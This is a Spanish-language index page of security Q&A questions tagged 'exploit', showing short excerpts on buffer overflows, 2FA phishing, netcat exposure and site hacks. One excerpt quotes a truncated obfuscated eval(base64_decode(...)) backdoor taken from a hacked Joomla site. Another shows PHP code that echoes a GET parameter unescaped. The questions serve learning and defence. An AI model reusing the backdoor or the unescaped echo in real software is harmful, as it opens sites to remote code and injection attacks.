Preguntas con etiqueta 'exploit'

1
respuesta

Cómo deshabilitar NX en Linux

Estoy aprendiendo la explotación del desbordamiento del búfer de la pila, y luego publiqué la pregunta Falla de segmentación del código de shell. acerca de la ejecución de shellcode desde el programa de prueba, o cuando se inyecta en un progra...
hecha 15.12.2018 - 19:15
0
respuestas

¿Qué es el exploit SPL? [cerrado]

Recientemente trabajé en un proyecto web que usa Javascript y PHP para cargar su contenido desde la API de flickr. Continué haciendo que esta imagen aparezca y desaparezca inmediatamente durante los primeros 2 o 3 segundos de carga de la pági...
hecha 19.03.2013 - 10:37
3
respuestas

Gran cantidad de backlinks ocultos de pornografía de sitios legítimos de WordPress, ¿por qué lo hicieron?

Estaba haciendo una investigación de backlinks y encontré una gran cantidad de sitios web legítimos que enlazan con el sitio que estaba investigando. El problema fue que el texto de anclaje de todos los enlaces donde términos relacionados co...
hecha 29.07.2017 - 12:16
0
respuestas

Estudios de caso de hacks de alto perfil [cerrado]

Cada ataque se produce debido a una forma de vulnerabilidad de seguridad u otra, y creo que la mejor manera de evitar / corregir estas vulnerabilidades es conocerlas. ¿Hay algún lugar en Internet donde pueda encontrar estudios de caso de hack...
hecha 23.01.2015 - 10:50
5
respuestas

sitio puerta trasera y eval ()

Estoy ejecutando un sitio Joomla 1.7 que fue hackeado hoy. Debajo de la secuencia de comandos hizo el hack. eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZS...
hecha 21.02.2013 - 10:54
2
respuestas

¿Por qué molestarse con ciertos tipos de 2fa si se pueden omitir fácilmente?

En la naturaleza, hay un método para eludir 2fa. La esencia de esto es que el atacante no solo phishea la contraseña, sino que también phish el segundo factor y los usa para un inicio de sesión real en su propia máquina. (descrito en detalle aqu...
hecha 06.09.2018 - 19:01
3
respuestas

¿Cómo un hacker profesional penetraría una computadora en una red? [cerrado]

Qué tipo de vulnerabilidades o agujeros de seguridad usaría un pirata informático para penetrar y controlar una computadora en una red, como una PC normal en una red predeterminada (LAN inalámbrica). A menudo escucho que la computadora de una...
hecha 23.07.2016 - 14:21
5
respuestas

¿Cómo analizar las URL de correo electrónico no deseado para detectar vulnerabilidades?

Estoy recibiendo correos electrónicos no deseados que, al mirar los encabezados de los correos electrónicos, parecen provenir de una variedad de computadoras de todo el planeta. Siempre son el mismo tipo de correo electrónico que contiene URL no...
hecha 20.02.2015 - 16:42
1
respuesta

¿Es nc -l no explotable?

Supongamos que quiero configurar un servidor como una prueba y quiero que esté expuesto a Internet, dando acceso a cualquier IP. Podría ser por cualquier motivo o sin motivo. No quiero que corra el riesgo de un desbordamiento de búfer y la ej...
hecha 29.04.2014 - 22:39
1
respuesta

¿Alguna forma de explotar PHP a través de un parámetro de eco?

Me preguntaba, digamos que tenemos una página como esta. <?php if(isset($_GET['example'])){ echo $_GET['example']; } ¿Habría alguna forma de explotar esta página para hacer algo como ejecutar PHP o acceder a los archivos del servidor? ¿A...
hecha 25.11.2015 - 21:56